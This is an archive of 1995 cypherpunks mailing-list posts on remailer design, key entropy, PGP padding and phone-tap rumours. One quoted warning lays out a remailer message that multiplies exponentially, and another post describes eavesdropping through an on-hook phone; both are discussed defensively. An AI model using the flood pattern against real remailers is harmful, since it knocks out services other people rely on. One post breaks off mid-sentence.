From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 2 Feb 95 08:37:22 PST
To: Nobody@eniac.ac.siue.edu (Anonymous)
Subject: Re: How much entropy in a key press?
In-Reply-To: <199502021456.IAA01951@eniac.ac.siue.edu>
Message-ID: <199502021639.LAA15114@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Shannon estimates roughly 1 bit per character of English.  

RFC 1750  D. Eastlake, S. Crocker, J. Schiller,
"Randomness Recommendations for Security" is probably useful.

Adam

| Can anyone tell me how many bits of entropy there are per 7-bit ASCII
| character.  More specifically, a program wishes to generate a session
| key by prompting the user to type N random key presses.  The characters
| entered are hashed down to 128 bits by MD5 for subsequent use as a key.
| 
| What should the value of N be, such that the entropy of the user's
| string does not unnecessarily exceed the entropy of the hash?
| 
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 2 Feb 95 08:53:15 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Remailer encryption module
In-Reply-To: <199502021647.IAA07663@largo.remailer.net>
Message-ID: <9502021652.AA28840@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: "Perry E. Metzger" <perry@imsi.com>
> 
>    > Once we get a data format, implementations will follow.
> 
>    The obvious data format is MIME's "Security Multiparts".
> 
> That's not a complete answer.  That's kind of the obvious package, but
> it addresses nothing of the interior.

It does specify the interior.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Thu, 2 Feb 95 05:46:08 PST
To: cypherpunks@toad.com
Subject: computer underground digest stuff
Message-ID: <9502021305.AA25319@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Date: Fri, 20 Jan 1995 00:13:29 -0600 (CST)
From: David Smith <bladex@BGA.COM>
Subject: File 1--ACM Computers Seized by IIT (fwd)

               ---------- Forwarded message ----------

ACM Computers Seized By Illinois Institute of Technology

  "And let it be known throughout the world what was done this day..."

Dateline January 17, 1995

Today sometime before noon today, the Illinois Institute of Technology
seized the computer systems of the Association for Computing Machinery
student chapter at IIT.

700 Student and Faculty users are not happy.

And are now without their Email and other private files. The locations
of the ACM systems is currently unknown, and the security of the
system and the accounts on it is highly questionable, as it was quite
literally riped out of the wall. ( a piece of the modem was found
lying on the table ).

The reasons given by IIT where that members of ACM are suspected of
hacking into the computer of another IIT student group, and pulling
several pranks.  The memo sent to the Dean of Students details the
hacking attempt, but no evidence points to ACM's systems or to any of
their users, but the memo does make several unbacked accusations. And
at this time, we can see no reason ACM would even be tied to the
events. However because ACM members are suspect, the systems where
unlawfully seized by IIT.

IIT has no legal right to seize ACM's systems, nor anyone else, as
they contain private accounts, files, and Email.  Such rights are
protected under the Electronic Communications Privacy Act (ECPA),
which extended most of the protections of the federal Wiretap Act
("Title III") to electronic mail.  Precidence established in the case
Secret Service vs. Steve Jackson Games decided March 12, 1993

Needless to say, ACM members are not too happy about all of this.  And
the other 700 people don't seem happy either.

            ---------------------------------------------

Dateline January 18, 1995

   o Members realize that along with Troll, which is physicaly
     considered IIT's property even tho it was purchased with student
     funds, property of ACM members was also seized includind a
     network card, SIMM modules, and the modem that was broken by IIT
     during the seizure.

   o ACM recieves writen copy of allegations and supposed proof that
     ACM systems where used in the attempt. However the evidence
     clearly shows that other IIT owned systems where used and NOT
     ACM's systems.

   o Electronic Frontier Foundation is called and informed of the
     situation, and begins investigating the situation.

   o ACM HEARS THAT THE COMPUTER SYSTEM IS IN THE PROCESS OF BEING
     SEARCHED BY IIT STAFF, AND ACM MEMBERS NOW CONSIDER THE SYSTEM
     COMPROMISED. STILL NO EVIDENCE SHOWING ACM INVOLVEMENT.

   o Word continues to spread amung the IIT community, many more
     students and faculty are outraged about the seizure of their
     accounts and files.

   o Continued stress to students due to the lack of access to their
     Email, addressbooks, and other files. Email is now being lost in
     mass due to the

   o ACM systems removal, much of which is considered critical by many
     people.  ACM members miss the Chicago ACM meeting due to the fact
     that all the info concerning time/location was stored on the
     seized systems.

   o ACM members miss the Chicago ACM meeting due to the fact that all
     the info concerning time/location was stored on the seized
     systems.

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Thu, 2 Feb 95 10:18:38 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Fundamental Question?
In-Reply-To: <199502020400.XAA03916@libws2.ic.sunysb.edu>
Message-ID: <Pine.BSI.3.91.950202131351.27000B-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain



I guess that I don't have any real idea about how much traffic goes 
through remailers, myself having only used anon.penet.fi, and even that 
only to reply to others who were anonymized...  anyone have any 
approximate statistics about traffic through other remailers?

And although I know it might be a pain, could there be simple encryption 
(read: fast) that could be implemented so messages could be doubly 
encrypted, the plaintext by pgp, and the pgp text by something else and 
have the identity of the recipient inside the second encryption, where 
each message coming in could be checked to see if it should be pgp decrypted?

Maybe using a simple hash of the recipient's name or other identifying mark?

					-Anthony

On Wed, 1 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> Anthony Ortenzi wrote:
> > 
> > Although I understand the need for remailers for anonymity, is it not 
> > true that the whole idea of encryption (good encryption, that is) is that 
> > no matter who gets the encrypted text, it really doesn't matter?  Does 
> > this not mean that something like USENET is *perfect* for this?
> 
> Well, it's happened in the past. Doesn't mean Usenet is perfect for it,
> since nobody wants to sift through several thousand messages a day for
> messages encrypted to him/her.  Also, imagine all the traffic sent to a
> remailer duplicated on overy site that carries that Usenet group...
> 
> Rob
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Thu, 2 Feb 95 13:29:14 PST
To: alt.privacy.anon-server@myriad.pc.cc.cmu.edu
Subject: MX'ing and jpunix.com
Message-ID: <199502022127.PAA14199@jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


	JPUNIX.COM (soon to be alias.net) offers a MX service for
individuals that want to run an anonymous remailer but don't want the
domain they are operating from to be immediately apparent. By making
application to perry@jpunix.com, a remailer operator will be granted a DNS
MX record pointing to the domain address of the requestor's choice and 
will appear to reside in the jpunix.com (alias.net) domain. 

	Additional masking can be provided by having the MX record point
to myriad.pc.cc.cmu.edu. What good does this do? I have an agreement with
myriad.pc.cc.cmu.edu (Matt Ghio) where myriad will take the MX-pointed
record and additionally alias it through the smail daemon on myriad. This
function adds the unique benefit where determining the actual location of
the remailer in question will be foiled when using nslookup.  Since an
additional alias is performed the result of an nslookup will always point
to myriad. The actual location of the remailer remains hidden inside the
alias on myriad. Lastly, Matt has the EXPN function of his sendmail daemon
disabled so the identity of the remailer can't be determined by alias
expansion. 

	Future modifications to this scheme include adding an addition
step whereby the MX-alias process will cause a version of Raph Levien's
premail to post-process the message to add one or more random remailer
paths the the overall path that the message travels. This step in still in
the planning stages and has not been implemented yet. 

	If you have and questions, or want to set up an MX record, send
email to: 

perry@jpunix.com or ghio@myriad.pc.cc.cmu.edu

John Perry < perry@jpunix.com>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzFN6lOTpEThrthvAQHfAAQAkzoGHz7iaJKHMzB5GEQr8OvEwhDY0F9s
lCZUJhTw3KV2hVWDoUtZNPwiSf4vcsDhGx0CDQrDUon2vXC0mOHj4zBbDhhuUD5l
/NCPOmtWKFSnWiny2JbD0esNIuxIaWfa/tVTkDoDq/zPtsG0awmHTpGMSeIkkxvy
II1mDwnZ9n0=
=2jQD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 16:15:01 PST
To: cypherpunks@toad.com
Subject: Remailing in safe-tcl
Message-ID: <199502030014.QAA22049@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Suppose someone runs safe-tcl to process incoming mail, and supports the
"delivery-time" mode, where incoming mail programs are executed as soon
as they arrive.  (Support for this mode doesn't really exist yet, but
I am putting together a simple script to enable it.)  Here then is an
example of how a self-remailing message might look:

[Other headers]
Content-Type: multipart/enabled-mail; boundary="----- =_791623442"
Content-ID: <2269.791623082.4@cryo>

------- =_791623442
Content-Type: application/Safe-Tcl; version="7.3"; evaluation-time=delivery
Content-ID: <2269.791623082.2@cryo>

# Get the other sub-part of this message and send it to the desired address
SafeTcl_sendmessage -to hfinney@shell.portal.com \
        -subject {Remailed message} -body [SafeTcl_getbodyprop 1.2 all]

------- =_791623442
Content-Type: text/plain
Content-ID: <2269.791623082.3@cryo>

This is the body of the message, which will get remailed.  It could be
a PGP message if the server supported automatic decryption of incoming
PGP mail.  Then it could have nested remailing instructions in it.

------- =_791623442--


This is a MIME format message with two sub-parts.  The first is the
script which gets run on delivery, and the second is the "payload", the
message to be remailed.  The script is a simple one-liner which sends
the second subpart to my email address.

Safe-Tcl does allow (rather vaguely) for automatic decryption of incoming
mail, as well as authentication (so you might allow messages signed by
certain people to get access to some special functions).  There is a
rudimentary mechanism for communication between scripts and server, and
(I think) among scripts themselves, with SafeTcl_getconfigdata and
SafeTcl_setconfigdata.  These let you put in {key, value} pairs that
other scripts can read.

I don't see any straightforward way for a script to suspend itself and
re-activate on some future event (such as the arrival of another
message).  Maybe it could put its whole self into the config database as
a {key, value} pair and rely on future messages to pull it out and
execute it.  But that doesn't seem too great.

There is a lot of interest in this notion of mail messages as scripted
agents which go zipping about the network gathering data which they send
home.  I am optimistic that we will be able to get remailing capabilities
out of this infrastructure largely for free.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Luis Agustin Perez  <lperez@oswego.Oswego.EDU>
Date: Thu, 2 Feb 95 13:27:56 PST
To: CYPHERPUNKS@toad.com.
Subject: info
Message-ID: <Pine.3.89.9502021627.A17221-0100000@cloy.oswego.edu>
MIME-Version: 1.0
Content-Type: text/plain


I recently read an atricle in HT magazine called cyberbucks. I was 
wondering if you could send me some information on the topic of the 
article.                                                          
                                                          thanx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Thu, 2 Feb 95 14:11:13 PST
To: cypherpunks@toad.com
Subject: Re: null
In-Reply-To: <199501311018.EAA01333@rebma.rebma.mn.org>
Message-ID: <UjAJVAi00WDJ4bQUw3@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


nobody@rebma.rebma.mn.org wrote:
> The current status of this is that I get the remailed receipt, but the
> message never shows in the group.  Is mail2news@demon.co.uk down?

Yes.

Try using mail2news@news.demon.co.uk or mail2news@myriad.pc.cc.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
Date: Thu, 2 Feb 95 14:56:26 PST
To: cypherpunks@toad.com
Subject: Remailer Unreliability
Message-ID: <m0raAVp-000vl1C@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


What if it was possible to specify an alternate remailer?  In the case that
a remailer went down, you could specify an alternate.  For example:

::
Anon-To: remailer@foo.com
Alternate-To: remailer@bar.com

::
Encrypted: PGP

---pgp msg---

If foo.com was down, the message would be delivered to bar.com instead.
The PGP message would have to be readable to both of them, so it would
decrease security, but reliability would be better, especially for
reply blocks.  Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 18:26:30 PST
To: cypherpunks@toad.com
Subject: Re:  Frothing remailers - an immodest proposal
Message-ID: <199502030225.SAA06856@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


One point re remailer reliability:  Even though in my discussions with
Nathan I did not really agree with his suggestion to have remailers check
signatures on incoming messages, actually Chaum did propose something
similar in his 1981 paper.

He would have each remailer sign the batch of messages it outputs each
cycle.  (Chaum's remailers used a straight batching approach.)  The idea,
as I recall, was to allow a remailer to prove that it had not engaged in
a denial-of-service attack by purposely dropping some message into the
bit bucket.  If some customer put his message in here and it didn't ever
come out over there, I guess the remailer could prove that it didn't lose
the message by showing its signed batch.  I'm not clear on the details
though.  Anyway, here is an area where message signing and reliability
have some intersection.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gary Jeffers" <CCGARY@MIZZOU1.missouri.edu>
Date: Thu, 2 Feb 95 16:01:21 PST
To: cypherpunks@toad.com
Subject: The FIREWALL CHIP. U're phone always offhook?
Message-ID: <199502022357.SAA28764@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

         THE FIREWALL CHIP!  U'RE PHONE ALWAYS OFFHOOK?

   We have potential bugging devices in all our houses - The telephone!
Of course, when it is onhook, the microphone does not transmit... or
does it? Would the phone have to be rewired to render it always
"offhook" or would it be an operation at the central phone company?
If the present models would have to be rewired, then how about future
models? Much function is done thru chips & so could many of the models
on the current market be remote programmable? See the latest issue of
Mondo 2000.

   This problem demands a hardware solution. How about an adapter module
between microphone & the rest of phone?

                     THE FIREWALL CHIP

   The Clipper chip architecture was secret! Cypherpunks demand source
code with their security software! How about a demand for the "visable"
chip. That is - a chip with a known architecture - that can be tested
for integrity & is a general computer chip for doing software
operations & for doing i/o with electronic devices? With our property
being loaded up with sophisticated "trust me" electronics, it may be
necessary to have a general electronic "FIREWALL CHIP".

   The FIREWALL CHIP could have its applications software supplied by
various companies which would specialize in fields for
detecting electronic intrusion. Some specializing in phone audio, others
in vision telephones, cell phone tracking, & many others to be
considered.

   The FIREWALL CHIP will be a future necessity. It & its software
suppliers will probably constitute an outlaw industry.

                                         PUSH EM BACK! PUSH EM BACK!
                                         WWWAAAYYY  BBBAAACCCK!
                                         BBBEEEAAATTTT  STATE!

                                         Gary Jeffers
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzFxYCoZzwIn1bdtAQG0ewF/RUMJZU1qXc+31XVQLfetSZst4j+S55/i
tq6j/JN5t3rjXa873mY5lT4cHCFBukfv
=NSeZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 2 Feb 95 19:01:25 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Unreliability
In-Reply-To: <m0raAVp-000vl1C@myriad.pc.cc.cmu.edu>
Message-ID: <199502030300.TAA10357@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Thu, 2 Feb 95 18:00 EST
> From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
> 
> What if it was possible to specify an alternate remailer?  In the case that
> a remailer went down, you could specify an alternate.  For example:

  Well, *I* think it is a good idea.  But how does remailer1 know that
remailer2 is both a remailer and down?

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 2 Feb 95 17:00:14 PST
To: Al Thompson <alt@iquest.net>
Subject: Re: "bad" government
In-Reply-To: <m0rZj0d-000E8pC@dorite.use.com>
Message-ID: <Pine.SUN.3.91.950202195912.3944C-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 Feb 1995, Al Thompson wrote:

> Date: Wed, 01 Feb 1995 12:31:20 -0600
> From: Al Thompson <alt@iquest.net>
> To: Charles Bell <quester@eskimo.com>
> Cc: cypherpunks@toad.com
> Subject: Re: "bad" government
> 
> 
> >> If strong government resulted in liberty and freedom, then the
> >> most intrusive, all-encompassing governments would result in 
> >> its citizens having the most liberty.  Is this the case?  I would
> >> look at the (former) Soviet Union, Iran, Cuba, East Germany, etc., 
> >> for your answer.
> 
> >Unrestricted individual freedom leads to unrestricted freedom of 
> >`private' corporations.  Private corporations uncurbed by society's law are 
> >autarkies: internally totalitarian, externally predatory, as amoral as 
> >amoebas.
> >
> >Is this the shape of the future you seek?

Yes, orginization by choice, not by design.

> You can NOT restrict someone's rights simply because they MIGHT harm another 
> (prior restraint).  If they do cause actual harm to someone, they should be 
> brought to justice.  To place restrictions on someone based on the 
> possibility that may may cause harm introduces restrictions based solely on 
> the authorities' opinions (political philosophy, religion, race, etc).

Precisely.

>  
> That that the shape of the future YOU seek?
> ************************************************************
> *           Just your basic signature block                *
> *                                                          *
> *  Al Thompson                                             *
> *  Fidonet 1:231/110                                       *
> *  alt@iquest.net                                          *
> ************************************************************
> 
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 2 Feb 95 18:01:19 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9502022036.D23979-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


>We had some concerns here a while back that someone was trying to exploit
>such a feature to create an exponentially-growing message that would
>totally overload the remailers.  A message of the form:
>
>::
>Request-Remailing-To: <list of remailers here>
>
>::
>Request-Remailing-To: <list of remailers here>
>
><repeat about 20 times>
>
>was sent.  If all remailers had observed and honored the multiple
>requests, there would have been uncounted trillions of messages flying
>about.  So I would caution anyone considering implementing this feature.
>
>Hal
 
Was this Detweiller's "exponentially growing message"?
Note that requiring pgp wrappers kills this...
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 2 Feb 95 18:03:03 PST
To: cypherpunks@toad.com
Subject: Frothing remailers - an immodest proposal
Message-ID: <Pine.3.89.9502022004.E23979-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
kevin@elvis.wicat.com:
 
>Be gentle, though - it's my first time.
 
Here?  You jest.  ;)
 
>It seems to me that the current remailer web suffers a fundamental flaw.
>It is simply too static. When a remailer disappears, service is
>disrupted and messages are lost. Humans have to statically route their
>messages through the web either by hand or using relatively primitive
>tools such as the chain script (not to belittle the useful work that has
>been done, but it is by no means idiot proof yet). Basically, the
>current web of mailers shows nothing of the dynamic nature that has kept
>the internet alive and has offered us a decent chance at truly anonymous
>communications, nor is it easy to use to its full potential.
>
>Consider a more dynamic web of remailers. I envision remailers that
>actively advertise their presence on the web so that all active
>remailers are aware of all other active remailers. This advertising is
>to have very low latency so that a new mailer can be known to the web
>within minutes (I will address the implementation of this later). Thus,
>remailers can constantly be appearing and disappearing without impact on
>the web as a whole (I refer to this dynamic web of remailers as a
>"froth"). Imagine also that remailers are allowed to dynamically perform
>the routing functions that are currently done statically offline (for
>reasons I will discuss shortly).
>
 
Some version of this discussion came up a few months ago, and I passed on
it then, but I think I've heard enough to comment now:
 
The remailers are based on an inherently different model than the InterNet.
Some of these differences, in fact, are crucial.
 
1) The InterNet is based on mutual cooperation/mutual trust.  Cypherpunks
   trust no one that they don't have to.
 
This is not just a result of our twisted psyche.  If we could trust
everyone, we wouldn't _need_ remailers.  Since we don't even know who is
whom out there, we avoid extending trust.
 
2) The InterNet is concerned first about reliability, and not at all about
   privacy.  The remailers are concerned first about privacy, and can leave
   reliability to the users, if need be.
 
There is nothing to prevent Alice and Bob agreeing to send each other ACK
statements, and retransmitting messages if they don't get the ACK.  There
has been some mention of remailers doing the same with each other, in an
attempt to improve net-wide reliability.  BTW, with T1, sending ACKs is not
unreasonable between remailers.
 
3)  From 1) and 2).  The remailers are heading towards mandatory PGP,
    possibly nested.  All InterNet messages are world-readable--although
    this may be changing as the model breaks down.
 
Again, this has to do with the intrinsic diffences.
 
>The use of such transient routers implies allowing dynamic routing. If
>any given remailer may go down or move at any point, it is impractical
>to expect users to keep track of which are up at the moment and create
>static routes in the current manner. The only reasonable solution I have
>come up with is to allow the remailers themselves to choose routing,
>given that they have full knowledge of the current state of the froth.
 
Here we have the real head of the problem, as Hal so asutely points out:
in your model, if the first remailer is bad, the message is compromised.
If user encrypt to all remailers, they might as well encrypt directly to
mole@snakeoil.nsa.gov.  If they don't, they severly limit who can pick out
their messages.  In particular, they bypass transient remailers.
 
But that isn't all.  If the remailers pick the route, they are in a no
better state than the users.  Since the flushing attack requires remailers
to operate on ticks, with carryover, an hour delay per remailer is almost
minimal, untill traffic really picks up.  So if some message routes through
four remailers, a minimum of four hour delay results.  In your case, this
could easily move between in/out of service modes.
 
 
>                 Think about the proposed extension to MixMaster to
>allow separate parts of a multi-part message to be routed separately,
>and consider whether you really want to have to do this by hand. I
>strongly suspect that most messages are currently routed via boilerplate
>scripts, which has to make the job of traffic analysis much easier for
>our good friend Eve.
 
Stupid is as stupid does.
 
 
>By the way, a brief rant on a related topic; people speak of not
>trusting remailers any further than necessary, while I am clearly
>suggesting granting more authority and trust to the remailers. This
>notion of not assigning trust is simply nonsense. When you send a piece
>of mail to a remailer, encrypted or not, you are assigning complete
>trust in that remailer to keep you anonymous and not to forward your
>mail to the NSA immediately.
 
NOT TRUE.  With proper use of encryption, you are trusting your first
remailer only to not reveal that you sent a message, and not to correlate
that message to the one it sends out.  With rational use of garbage running
two deep, you can even suffer this loss without significant harm.
 
 
>This does lead to a related problem, however; if we allow remailers to
>pop up at random and join in the froth, how do we know that Deitweiller
>won't set up a number of black hole remailers that take your mail and
>throw it away, disrupting the froth, or forward it to nphard@nsa.gov?
 
How indeed?  The reason we chain is because we _don't_ really trust our
first remailer--or any other.
 
>Fortunately, we already have the PGP web of trust model in place and can
>use it to good effect in this case. Remailers should simply not route
>mail through any remailer whose public key is not trusted unless
>explicitly ordered otherwise. This ring
remailers to the user--with an exception list for those not "live".
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 2 Feb 95 17:23:58 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Remailer encryption module
In-Reply-To: <199502021444.GAA07493@largo.remailer.net>
Message-ID: <9502030123.AA02022@josquin.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I agree.  PGP just does not have the support for the encryption
> required for mixing remailers.  These deficiencies have been known for
> about two years at this point and still nothing has happened.  I
> expect this not to change anytime soon.

Hmm -- I clearly haven't been reading this thread close enough!  How
is PGP deficient?  What do you need PGP to do in order to get it to
work right with remailers?  I've never seen a bug-report/ feature
request of this sort sent to pgp-bugs@mit.edu, so clearly no one
considered this for the MIT PGP release.

So, what does PGP need to be able to do?

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Thu, 2 Feb 95 20:44:04 PST
To: cypherpunks@toad.com
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
Message-ID: <199502030441.UAA17143@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>>    We have potential bugging devices in all our houses - The telephone!
>> Of course, when it is onhook, the microphone does not transmit... or
>> does it? 
>
>The Mondo article ("Total Surveillance" by Charles Ostman) was a joke.
>
>From the innacuracies in what I do know about, I assume all of the
>phone-paranoia is also unjustified.

Actually, there is a germ of truth in this.  On older phones (don't know if 
this works on newer electronic phones) when the handset is 'on-hook' a 
switch opens and breaks the voice circuit.  This of course only works for 
DC circuits.  If you drive that same circuit with an AC signal (from 
further up the line) then that 'open' switch becomes a capacitor and acts 
as a band-pass filter.  Signals from the mic will then modulate that AC 
current and can be extracted and reconstructed.  Supposedly the Dutch 
police have perfected this and use it in investigations to circumvent legal 
restrictions on physically bugging suspects homes; or so was alleged a 
couple of years ago during a narcotics trial in Amsterdam.

Dale H.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 2 Feb 95 18:04:17 PST
To: CCGARY@MIZZOU1.missouri.edu (Gary Jeffers)
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
In-Reply-To: <199502022357.SAA28764@bb.hks.net>
Message-ID: <95Feb2.210355edt.6007@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


>    We have potential bugging devices in all our houses - The telephone!
> Of course, when it is onhook, the microphone does not transmit... or
> does it? Would the phone have to be rewired to render it always
> "offhook" or would it be an operation at the central phone company?
> If the present models would have to be rewired, then how about future
> models? Much function is done thru chips & so could many of the models
> on the current market be remote programmable? See the latest issue of
> Mondo 2000.

The Mondo article ("Total Surveillance" by Charles Ostman) was a joke.
Among other things, he claims the Teledesic project is a massive
satellite surveilance scheme.  Those birds are going to be in
geo-synchronous orbit!  What's more, even a LEO spy-sat weighs many
tons.  Nobody could launch 840 satellites of that weight without being
noticed.

From the innacuracies in what I do know about, I assume all of the
phone-paranoia is also unjustified.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 2 Feb 95 18:12:33 PST
To: cypherpunks@toad.com
Subject: The FNORDWALL CHIP.
Message-ID: <199502030212.VAA22129@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



>    ----- Transcript of session follows -----
> ... while talking to toad.com.:
> >>> RCPT To:<cyberpunks@toad.com>
> <<< 550 <cyberpunks@toad.com>... User unknown
> 550 <cyberpunks@toad.com>... User unknown

Talk about lame. I accidentally CC'd this to "cyberpunks". *sigh*

[ More header snipped! ]

> 
> > 
> >          THE FIREWALL CHIP!  U'RE PHONE ALWAYS OFFHOOK?
> 
> Fnorjd!
> 
> > 
> >    We have potential bugging devices in all our houses - The telephone!
> > Of course, when it is onhook, the microphone does not transmit... or
> > does it? Would the phone have to be rewired to render it always
> > "offhook" or would it be an operation at the central phone company?
> 
> I believe there is a way to get regular analog phones to go "off hook"
> by sending the right kind of signal down the wire. Apparently not that
> reliable if you've got multiple extentions.  I think some newer phone
> systems and/or newer phones don't work that well for the method, though
> I never tried it myself.
> 
> 
> >    This problem demands a hardware solution. How about an adapter module
> > between microphone & the rest of phone?
> 
> How about disconnecting the phone when uneeded? Or, filter the calls through
> an answering machine (which may also defeat such a method described above).
> 
> [ Snip! ]
> > 
> >    The FIREWALL CHIP could have its applications software supplied by
> > various companies which would specialize in fields for
> > detecting electronic intrusion. Some specializing in phone audio, others
> > in vision telephones, cell phone tracking, & many others to be
> > considered.
> > 
> >    The FIREWALL CHIP will be a future necessity. It & its software
> > suppliers will probably constitute an outlaw industry.
> 
> I don't think it will be a necessity. I can think of several alternatives
> that don't require trusting an "outlaw industry".
> 
> Rob
> 
> 
> --VAA00527.791777197/abel.ic.sunysb.edu--
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 21:15:55 PST
To: cypherpunks@toad.com
Subject: Re: Adding padding to PGP files
Message-ID: <199502030514.VAA24599@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Nobody@eniac.ac.siue.edu (Anonymous)
> > Date: Thu, 2 Feb 1995 08:48:49 -0800
> > From: Hal <hfinney@shell.portal.com>
> > 
> > It only works on binary ".pgp" public-key encrypted files (not ascii armored
> > files).  So there would be some work needed to make it a really useful tool.
> > 
> > Hal
> 
>   I just tried adding random characters at the end of a pgp ascii
> armoured message.  I had to cut out the checksum, but pgp was able to
> decrypt the message just fine.  So a very simple program (ideally with
> a strong source of random numbers) should be able to pad ascii
> armoured files.

Unfortunately, this approach is easy but doesn't really succeed in adding
undetectable padding.  The PGP message, once the ascii armor is stripped
away, has a byte count in it.  Anyone can de-armor the message and see
that this byte count does not match the size of the file.  So you also
need to bump this byte count to match the added bytes.  That's all my
perl script does that I posted.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 2 Feb 95 18:26:52 PST
To: Nobody@eniac.ac.siue.edu
Subject: Re: How much entropy in a key press?
In-Reply-To: <199502021456.IAA01951@eniac.ac.siue.edu>
Message-ID: <199502030226.VAA22341@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Can anyone tell me how many bits of entropy there are per 7-bit ASCII
> character.  More specifically, a program wishes to generate a session
> key by prompting the user to type N random key presses.  The characters
> entered are hashed down to 128 bits by MD5 for subsequent use as a key.

Depends. You could use a fast timer and sample between keystrokes, then
use the least significant byte of the difference like PGP does (for DOS,
anyway).  You could change that so it samples bits instead of bytes,
but it's conceivable that you'll have less randomness that way.

I've experimented with speeding up the timer IRQs on my PC for that but
found it was superficially less random (in a pool of 256 bytes there
were more duplicates).

> What should the value of N be, such that the entropy of the user's
> string does not unnecessarily exceed the entropy of the hash?

With a decent timerr that samples bytes, I'd say 16 keystrokes. Use
a cypher overtha random data to garbe it a bit.

Rob

> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 2 Feb 95 18:36:54 PST
